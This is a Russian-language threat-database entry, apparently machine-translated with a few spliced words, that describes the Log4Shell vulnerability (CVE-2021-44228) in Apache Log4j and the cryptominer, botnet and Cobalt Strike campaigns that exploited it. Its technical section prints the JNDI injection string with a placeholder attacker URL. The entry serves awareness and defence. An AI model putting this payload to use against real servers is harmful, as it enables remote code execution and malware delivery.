Threat Database Vulnerability Уязвимость Log4Shell

Уязвимость Log4Shell

10 декабря 2021 года был выпущен эксплойт для критической уязвимости в Java-платформе логирования Apache Log4j.публично. Уязвимость, отслеживаемая как CVE-2021-44228 или Log4Shell, затрагивает версии Log4j, начиная с Log4j 2.0-beta9 и до 2.14.1. Злоумышленники могут воспользоваться эксплойтом для установления удаленного доступа без аутентификации, выполнения кода, доставки вредоносных программ или сбора информации. Уязвимости присвоен статус критической, поскольку Log4j широко используется корпоративными приложениями и облачными сервисами.

Технические подробности Log4Shell

Эксплойт начинается с того, что злоумышленник меняет пользовательский агент своего веб-браузера. Затем они посещают сайт или ищут конкретную строку, присутствующую на веб-сайтах в формате:

$ {jndi: ldap: // [атакующий_URL]}

В результате строка будет добавлена в журналы доступа веб-сервера. Затем злоумышленники ждут, пока приложение Log4j проанализирует эти журналы и достигнет добавленной строки. В этом случае сработает ошибка, в результате чего сервер обратится к URL-адресу, указанному в строке JNDI. Этот URL-адрес используется для обработки команд в кодировке Base64 или классов Java.впоследствии и выполнить их на взломанном устройстве.

Apache быстро выпустил новую версию - Log4j 2.15.0, чтобы устранить и исправить эксплойт, но значительное количество уязвимых систем может оставаться без исправлений в течение длительного периода. В то же время злоумышленники быстро обратили внимание на уязвимость нулевого дня Log4Shell и начали сканирование в поисках подходящих серверов для использования. Сообщество информационной безопасности отслеживало многочисленные кампании атак с использованием Log4Shell для доставки широкого спектра вредоносных угроз.

Log4Shell используется в атаках криптомайнера, ботнета, бэкдора и сбора данных

Одним из первых злоумышленников, внедривших Log4Shell в свои операции, были киберпреступники, стоящие за ботнетом Kinsing для майнинга криптовалют. Хакеры использовали Log4Shell для доставки полезной нагрузки в кодировке Base64 и запуска сценариев оболочки. Роль этих скриптов - очистить целевую систему от конкурирующих угроз крипто-майнинга до того, как будет запущено их собственное вредоносное ПО Kinsing.

Netlab 360 обнаружил злоумышленников, использующих уязвимость, для установки версий ботнетов Mirai и Muhstik на взломанных устройствах. Эти вредоносные программы предназначены для добавления зараженных систем в сеть IoT-устройств и серверов, которые злоумышленники могут затем дать указание запустить DDoS-атаки (распределенный отказ в обслуживании) или развернуть криптомайнеры.впоследствии.

По данным Microsoft Threat Intelligence Center, эксплойт Log4j также стал мишенью для атак, сбрасывающих маяки Cobalt Strike. Cobalt Strike - это законный программный инструмент, используемый для тестирования на проникновение систем безопасности компании.Тем не менее, его бэкдорные возможности сделали его частью арсенала многочисленных групп злоумышленников. После этого незаконный бэкдор-доступ к сети жертвы используется для доставки полезной нагрузки следующего уровня, такой как программы-вымогатели, кражи информации и другие вредоносные программы.

Log4Shell можно использовать для получения переменных среды, содержащих данные сервера. Таким образом, злоумышленники могут получить доступ к имени хоста, имени ОС, номеру версии ОС, имени пользователя, под которым работает служба Log4j, и многому другому.

Похожие сообщения

В тренде

Наиболее просматриваемые

Загрузка...